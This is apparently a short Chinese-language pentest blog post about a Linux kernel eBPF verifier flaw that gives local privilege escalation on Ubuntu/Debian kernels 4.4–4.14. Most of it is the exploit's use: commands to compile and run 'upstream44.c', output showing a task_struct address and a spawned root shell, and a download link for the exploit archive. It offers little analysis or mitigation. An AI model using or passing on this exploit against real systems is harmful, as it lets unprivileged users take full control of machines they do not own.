Ubuntu 提权 EXP

X1r0z included in Pentest
  About 100 words One minute 

该漏洞存在于 Linux 内核带有的 eBPF bpf(2) 系统调用中, 当用户提供恶意 BPF 程序使 eBPF 验证器模块产生计算错误, 导致任意内存读写问题.

kernel 4.14 - 4.4

Only Ubuntu / Debian

1
2
3
4
5
6
7
8

$ gcc -o exp upstream44.c
$ chmod 777 exp
$ ./exp
task_struct = ffff8800789c1540
uidptr = fff88007c0cb6c4
spawning root shell
# whoami
root

upstream44.zip

Updated on 2018-03-30 
CC BY-NC-SA 4.0
Read Markdown
EXPLinux
Back | Home
0%